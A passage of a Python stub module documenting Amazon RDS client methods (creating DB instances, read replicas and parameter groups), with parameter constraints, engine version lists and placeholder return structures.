Must be 1 to 16 alphanumeric characters.
Cannot be a reserved word for the chosen database engine.
Microsoft SQL Server
Constraints:
Must be 1 to 128 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
MySQL
Constraints:
Must be 1 to 16 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
Oracle
Constraints:
Must be 1 to 30 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
PostgreSQL
Constraints:
Must be 1 to 63 alphanumeric characters.
First character must be a letter.
Cannot be a reserved word for the chosen database engine.
:type MasterUserPassword: string
:param MasterUserPassword: The password for the master database user. Can be any printable ASCII character except '/', ''', or '@'.
Amazon Aurora
Not applicable. You specify the password for the master database user when you create your DB cluster.
MariaDB
Constraints: Must contain from 8 to 41 characters.
Microsoft SQL Server
Constraints: Must contain from 8 to 128 characters.
MySQL
Constraints: Must contain from 8 to 41 characters.
Oracle
Constraints: Must contain from 8 to 30 characters.
PostgreSQL
Constraints: Must contain from 8 to 128 characters.
:type DBSecurityGroups: list
:param DBSecurityGroups: A list of DB security groups to associate with this DB instance.
Default: The default DB security group for the database engine.
(string) --
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds: A list of EC2 VPC security groups to associate with this DB instance.
Default: The default EC2 VPC security group for the DB subnet group's VPC.
(string) --
:type AvailabilityZone: string
:param AvailabilityZone: The EC2 Availability Zone that the database instance will be created in. For information on regions and Availability Zones, see Regions and Availability Zones .
Default: A random, system-chosen Availability Zone in the endpoint's region.
Example: us-east-1d
Constraint: The AvailabilityZone parameter cannot be specified if the MultiAZ parameter is set to true . The specified Availability Zone must be in the same region as the current endpoint.
:type DBSubnetGroupName: string
:param DBSubnetGroupName: A DB subnet group to associate with this DB instance.
If there is no DB subnet group, then it is a non-VPC DB instance.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: The weekly time range during which system maintenance can occur, in Universal Coordinated Time (UTC). For more information, see DB Instance Maintenance .
Format: ddd:hh24:mi-ddd:hh24:mi
Default: A 30-minute window selected at random from an 8-hour block of time per region, occurring on a random day of the week. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Valid Days: Mon, Tue, Wed, Thu, Fri, Sat, Sun
Constraints: Minimum 30-minute window.
:type DBParameterGroupName: string
:param DBParameterGroupName: The name of the DB parameter group to associate with this DB instance. If this argument is omitted, the default DBParameterGroup for the specified engine will be used.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type BackupRetentionPeriod: integer
:param BackupRetentionPeriod: The number of days for which automated backups are retained. Setting this parameter to a positive number enables backups. Setting this parameter to 0 disables automated backups.
Default: 1
Constraints:
Must be a value from 0 to 35
Cannot be set to 0 if the DB instance is a source to Read Replicas
:type PreferredBackupWindow: string
:param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled, using the BackupRetentionPeriod parameter. For more information, see DB Instance Backups .
Default: A 30-minute window selected at random from an 8-hour block of time per region. To see the time blocks available, see Adjusting the Preferred DB Instance Maintenance Window .
Constraints:
Must be in the format hh24:mi-hh24:mi .
Times should be in Universal Coordinated Time (UTC).
Must not conflict with the preferred maintenance window.
Must be at least 30 minutes.
:type Port: integer
:param Port: The port number on which the database accepts connections.
MySQL
Default: 3306
Valid Values: 1150-65535
Type: Integer
MariaDB
Default: 3306
Valid Values: 1150-65535
Type: Integer
PostgreSQL
Default: 5432
Valid Values: 1150-65535
Type: Integer
Oracle
Default: 1521
Valid Values: 1150-65535
SQL Server
Default: 1433
Valid Values: 1150-65535 except for 1434 , 3389 , 47001 , 49152 , and 49152 through 49156 .
Amazon Aurora
Default: 3306
Valid Values: 1150-65535
Type: Integer
:type MultiAZ: boolean
:param MultiAZ: Specifies if the DB instance is a Multi-AZ deployment. You cannot set the AvailabilityZone parameter if the MultiAZ parameter is set to true.
:type EngineVersion: string
:param EngineVersion: The version number of the database engine to use.
The following are the database engines and major and minor versions that are available with Amazon RDS. Not every database engine is available for every AWS region.
Amazon Aurora
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-2, eu-west-1, us-east-1, us-east-2, us-west-2): 5.6.10a
MariaDB
Version 10.1 (available in these AWS regions: us-east-2): 10.1.16
Version 10.1 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-west-1, us-west-2): 10.1.14
Version 10.0 (available in all AWS regions): 10.0.24
Version 10.0 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 10.0.17
Microsoft SQL Server 2016
13.00.2164.0.v1 (supported for all editions, and all AWS regions except sa-east-1)
Microsoft SQL Server 2014
12.00.5000.0.v1 (supported for all editions, and all AWS regions)
12.00.4422.0.v1 (supported for all editions except Enterprise Edition, and all AWS regions except us-east-2)
Microsoft SQL Server 2012
11.00.6020.0.v1 (supported for all editions, and all AWS regions)
11.00.5058.0.v1 (supported for all editions, and all AWS regions except us-east-2)
11.00.2100.60.v1 (supported for all editions, and all AWS regions except us-east-2)
Microsoft SQL Server 2008 R2
10.50.6529.0.v1 (supported for all editions, and all AWS regions except us-east-2)
10.50.6000.34.v1 (supported for all editions, and all AWS regions except us-east-2)
10.50.2789.0.v1 (supported for all editions, and all AWS regions except us-east-2)
MySQL
Version 5.7 (available in all AWS regions): 5.7.11
Version 5.7 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.7.10
Version 5.6 (available in all AWS regions): 5.6.29
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-south-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.6.27
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-northeast-2, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.6.23
Version 5.6 (available in these AWS regions: ap-northeast-1, ap-southeast-1, ap-southeast-2, eu-central-1, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.6.19a | 5.6.19b | 5.6.21 | 5.6.21b | 5.6.22
Version 5.5 (available in all AWS regions): 5.5.46
Version 5.1 (only available in AWS regions ap-northeast-1, ap-southeast-1, ap-southeast-2, eu-west-1, sa-east-1, us-east-1, us-gov-west-1, us-west-1, us-west-2): 5.1.73a | 5.1.73b
Oracle 12c
12.1.0.2.v8 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v7 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v6 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v5 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v4 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v3 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v2 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
12.1.0.2.v1 (supported for EE in all AWS regions, and SE2 in all AWS regions except us-gov-west-1)
Oracle 11g
11.2.0.4.v12 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v11 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v10 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v9 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v8 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v7 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v6 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v5 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v4 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v3 (supported for EE, SE1, and SE, in all AWS regions)
11.2.0.4.v1 (supported for EE, SE1, and SE, in all AWS regions)
PostgreSQL
Version 9.6.x: 9.6.1 | 9.6.2
Version 9.5.x: 9.5.6 | 9.5.4 | 9.5.2
Version 9.4.x: 9.4.11 | 9.4.9 | 9.4.7
Version 9.3.x: 9.3.16 | 9.3.14 | 9.3.12
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor engine upgrades will be applied automatically to the DB instance during the maintenance window.
Default: true
:type LicenseModel: string
:param LicenseModel: License model information for this DB instance.
Valid values: license-included | bring-your-own-license | general-public-license
:type Iops: integer
:param Iops: The amount of Provisioned IOPS (input/output operations per second) to be initially allocated for the DB instance.
Constraints: Must be a multiple between 3 and 10 of the storage amount for the DB instance. Must also be an integer multiple of 1000. For example, if the size of your DB instance is 500 GB, then your Iops value can be 2000, 3000, 4000, or 5000.
:type OptionGroupName: string
:param OptionGroupName: Indicates that the DB instance should be associated with the specified option group.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type CharacterSetName: string
:param CharacterSetName: For supported engines, indicates that the DB instance should be associated with the specified CharacterSet.
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
Default VPC: true
VPC: false
If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type DBClusterIdentifier: string
:param DBClusterIdentifier: The identifier of the DB cluster that the instance will belong to.
For information on creating a DB cluster, see CreateDBCluster .
Type: String
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the DB instance.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type TdeCredentialArn: string
:param TdeCredentialArn: The ARN from the Key Store with which to associate the instance for TDE encryption.
:type TdeCredentialPassword: string
:param TdeCredentialPassword: The password for the given ARN from the Key Store in order to access the device.
:type StorageEncrypted: boolean
:param StorageEncrypted: Specifies whether the DB instance is encrypted.
Default: false
:type KmsKeyId: string
:param KmsKeyId: The KMS key identifier for an encrypted DB instance.
The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are creating a DB instance with the same AWS account that owns the KMS encryption key used to encrypt the new DB instance, then you can use the KMS key alias instead of the ARN for the KM encryption key.
If the StorageEncrypted parameter is true, and you do not specify a value for the KmsKeyId parameter, then Amazon RDS will use your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS region.
:type Domain: string
:param Domain: Specify the Active Directory Domain to create the instance in.
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the DB instance to snapshots of the DB instance; otherwise false. The default is false.
:type MonitoringInterval: integer
:param MonitoringInterval: The interval, in seconds, between points when Enhanced Monitoring metrics are collected for the DB instance. To disable collecting Enhanced Monitoring metrics, specify 0. The default is 0.
If MonitoringRoleArn is specified, then you must also set MonitoringInterval to a value other than 0.
Valid Values: 0, 1, 5, 10, 15, 30, 60
:type MonitoringRoleArn: string
:param MonitoringRoleArn: The ARN for the IAM role that permits RDS to send enhanced monitoring metrics to CloudWatch Logs. For example, arn:aws:iam:123456789012:role/emaccess . For information on creating a monitoring role, go to Setting Up and Enabling Enhanced Monitoring .
If MonitoringInterval is set to a value other than 0, then you must supply a MonitoringRoleArn value.
:type DomainIAMRoleName: string
:param DomainIAMRoleName: Specify the name of the IAM role to be used when making API calls to the Directory Service.
:type PromotionTier: integer
:param PromotionTier: A value that specifies the order in which an Aurora Replica is promoted to the primary instance after a failure of the existing primary instance. For more information, see Fault Tolerance for an Aurora DB Cluster .
Default: 1
Valid Values: 0 - 15
:type Timezone: string
:param Timezone: The time zone of the DB instance. The time zone parameter is currently supported only by Microsoft SQL Server .
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Default: false
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def create_db_instance_read_replica(DBInstanceIdentifier=None, SourceDBInstanceIdentifier=None, DBInstanceClass=None, AvailabilityZone=None, Port=None, AutoMinorVersionUpgrade=None, Iops=None, OptionGroupName=None, PubliclyAccessible=None, Tags=None, DBSubnetGroupName=None, StorageType=None, CopyTagsToSnapshot=None, MonitoringInterval=None, MonitoringRoleArn=None, KmsKeyId=None, PreSignedUrl=None, EnableIAMDatabaseAuthentication=None, SourceRegion=None):
"""
Creates a DB instance for a DB instance running MySQL, MariaDB, or PostgreSQL that acts as a Read Replica of a source DB instance.
All Read Replica DB instances are created as Single-AZ deployments with backups disabled. All other DB instance attributes (including DB security groups and DB parameter groups) are inherited from the source DB instance, except as specified below.
You can create an encrypted Read Replica in a different AWS Region than the source DB instance. In that case, the region where you call the CreateDBInstanceReadReplica action is the destination region of the encrypted Read Replica. The source DB instance must be encrypted.
To create an encrypted Read Replica in another AWS Region, you must provide the following values:
To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
See also: AWS API Documentation
Examples
This example creates a DB instance read replica.
Expected Output:
:example: response = client.create_db_instance_read_replica(
DBInstanceIdentifier='string',
SourceDBInstanceIdentifier='string',
DBInstanceClass='string',
AvailabilityZone='string',
Port=123,
AutoMinorVersionUpgrade=True|False,
Iops=123,
OptionGroupName='string',
PubliclyAccessible=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
DBSubnetGroupName='string',
StorageType='string',
CopyTagsToSnapshot=True|False,
MonitoringInterval=123,
MonitoringRoleArn='string',
KmsKeyId='string',
EnableIAMDatabaseAuthentication=True|False,
SourceRegion='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier of the Read Replica. This identifier is the unique key that identifies a DB instance. This parameter is stored as a lowercase string.
:type SourceDBInstanceIdentifier: string
:param SourceDBInstanceIdentifier: [REQUIRED]
The identifier of the DB instance that will act as the source for the Read Replica. Each DB instance can have up to five Read Replicas.
Constraints:
Must be the identifier of an existing MySQL, MariaDB, or PostgreSQL DB instance.
Can specify a DB instance that is a MySQL Read Replica only if the source is running MySQL 5.6.
Can specify a DB instance that is a PostgreSQL DB instance only if the source is running PostgreSQL 9.3.5 or later.
The specified DB instance must have automatic backups enabled, its backup retention period must be greater than 0.
If the source DB instance is in the same region as the Read Replica, specify a valid DB instance identifier.
If the source DB instance is in a different region than the Read Replica, specify a valid DB instance ARN. For more information, go to Constructing a Amazon RDS Amazon Resource Name (ARN) .
:type DBInstanceClass: string
:param DBInstanceClass: The compute and memory capacity of the Read Replica. Note that not all instance classes are available in all regions for all DB engines.
Valid Values: db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.xlarge |db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
Default: Inherits from the source DB instance.
:type AvailabilityZone: string
:param AvailabilityZone: The Amazon EC2 Availability Zone that the Read Replica will be created in.
Default: A random, system-chosen Availability Zone in the endpoint's region.
Example: us-east-1d
:type Port: integer
:param Port: The port number that the DB instance uses for connections.
Default: Inherits from the source DB instance
Valid Values: 1150-65535
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor engine upgrades will be applied automatically to the Read Replica during the maintenance window.
Default: Inherits from the source DB instance
:type Iops: integer
:param Iops: The amount of Provisioned IOPS (input/output operations per second) to be initially allocated for the DB instance.
:type OptionGroupName: string
:param OptionGroupName: The option group the DB instance will be associated with. If omitted, the default option group for the engine specified will be used.
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
Default VPC: true
VPC: false
If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type DBSubnetGroupName: string
:param DBSubnetGroupName: Specifies a DB subnet group for the DB instance. The new DB instance will be created in the VPC associated with the DB subnet group. If no DB subnet group is specified, then the new DB instance is not created in a VPC.
Constraints:
Can only be specified if the source DB instance identifier specifies a DB instance in another region.
The specified DB subnet group must be in the same region in which the operation is running.
All Read Replicas in one region that are created from the same source DB instance must either:
Specify DB subnet groups from the same VPC. All these Read Replicas will be created in the same VPC.
Not specify a DB subnet group. All these Read Replicas will be created outside of any VPC.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the Read Replica.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the Read Replica to snapshots of the Read Replica; otherwise false. The default is false.
:type MonitoringInterval: integer
:param MonitoringInterval: The interval, in seconds, between points when Enhanced Monitoring metrics are collected for the Read Replica. To disable collecting Enhanced Monitoring metrics, specify 0. The default is 0.
If MonitoringRoleArn is specified, then you must also set MonitoringInterval to a value other than 0.
Valid Values: 0, 1, 5, 10, 15, 30, 60
:type MonitoringRoleArn: string
:param MonitoringRoleArn: The ARN for the IAM role that permits RDS to send enhanced monitoring metrics to CloudWatch Logs. For example, arn:aws:iam:123456789012:role/emaccess . For information on creating a monitoring role, go to To create an IAM role for Amazon RDS Enhanced Monitoring .
If MonitoringInterval is set to a value other than 0, then you must supply a MonitoringRoleArn value.
:type KmsKeyId: string
:param KmsKeyId: The AWS KMS key ID for an encrypted Read Replica. The KMS key ID is the Amazon Resource Name (ARN), KMS key identifier, or the KMS key alias for the KMS encryption key.
If you create an unencrypted Read Replica and specify a value for the KmsKeyId parameter, Amazon RDS encrypts the target Read Replica using the specified KMS encryption key.
If you create an encrypted Read Replica from your AWS account, you can specify a value for KmsKeyId to encrypt the Read Replica with a new KMS encryption key. If you don't specify a value for KmsKeyId , then the Read Replica is encrypted with the same KMS key as the source DB instance.
If you create an encrypted Read Replica in a different AWS region, then you must specify a KMS key for the destination AWS region. KMS encryption keys are specific to the region that they are created in, and you cannot use encryption keys from one region in another region.
:type PreSignedUrl: string
:param PreSignedUrl: The URL that contains a Signature Version 4 signed request for the CreateDBInstanceReadReplica API action in the AWS region that contains the source DB instance. The PreSignedUrl parameter must be used when encrypting a Read Replica from another AWS region.
The presigned URL must be a valid request for the CreateDBInstanceReadReplica API action that can be executed in the source region that contains the encrypted DB instance. The presigned URL request must contain the following parameter values:
DestinationRegion - The AWS Region that the Read Replica is created in. This region is the same one where the CreateDBInstanceReadReplica action is called that contains this presigned URL. For example, if you create an encrypted Read Replica in the us-east-1 region, and the source DB instance is in the west-2 region, then you call the CreateDBInstanceReadReplica action in the us-east-1 region and provide a presigned URL that contains a call to the CreateDBInstanceReadReplica action in the us-west-2 region. For this example, the DestinationRegion in the presigned URL must be set to the us-east-1 region.
KmsKeyId - The KMS key identifier for the key to use to encrypt the Read Replica in the destination region. This is the same identifier for both the CreateDBInstanceReadReplica action that is called in the destination region, and the action contained in the presigned URL.
SourceDBInstanceIdentifier - The DB instance identifier for the encrypted Read Replica to be created. This identifier must be in the Amazon Resource Name (ARN) format for the source region. For example, if you create an encrypted Read Replica from a DB instance in the us-west-2 region, then your SourceDBInstanceIdentifier would look like this example: arn:aws:rds:us-west-2:123456789012:instance:mysql-instance1-instance-20161115 .
To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
Please note that this parameter is automatically populated if it is not provided. Including this parameter is not required
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Aurora 5.6 or higher.
Default: false
:type SourceRegion: string
:param SourceRegion: The ID of the region that contains the source for the read replica.
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
DBInstanceIdentifier - The identifier for the encrypted Read Replica in the destination region.
SourceDBInstanceIdentifier - The DB instance identifier for the encrypted Read Replica. This identifier must be in the ARN format for the source region and is the same value as the SourceDBInstanceIdentifier in the presigned URL.
"""
pass
def create_db_parameter_group(DBParameterGroupName=None, DBParameterGroupFamily=None, Description=None, Tags=None):
"""
Creates a new DB parameter group.
A DB parameter group is initially created with the default parameters for the database engine used by the DB instance. To provide custom values for any of the parameters, you must modify the group after creating it using ModifyDBParameterGroup . Once you've created a DB parameter group, you need to associate it with your DB instance using ModifyDBInstance . When you associate a new DB parameter group with a running DB instance, you need to reboot the DB instance without failover for the new DB parameter group and associated settings to take effect.
See also: AWS API Documentation
Examples
This example creates a DB parameter group.
Expected Output:
:example: response = client.create_db_parameter_group(
DBParameterGroupName='string',
DBParameterGroupFamily='string',
Description='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DBParameterGroupName: string
:param DBParameterGroupName: [REQUIRED]
The name of the DB parameter group.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Note
This value is stored as a lowercase string.
:type DBParameterGroupFamily: string
:param DBParameterGroupFamily: [REQUIRED]
The DB parameter group family name. A DB parameter group can be associated with one and only one DB parameter group family, and can be applied only to a DB instance running a database engine and engine version compatible with that DB parameter group family.
:type Description: string
:param Description: [REQUIRED]
The description for the DB parameter group.
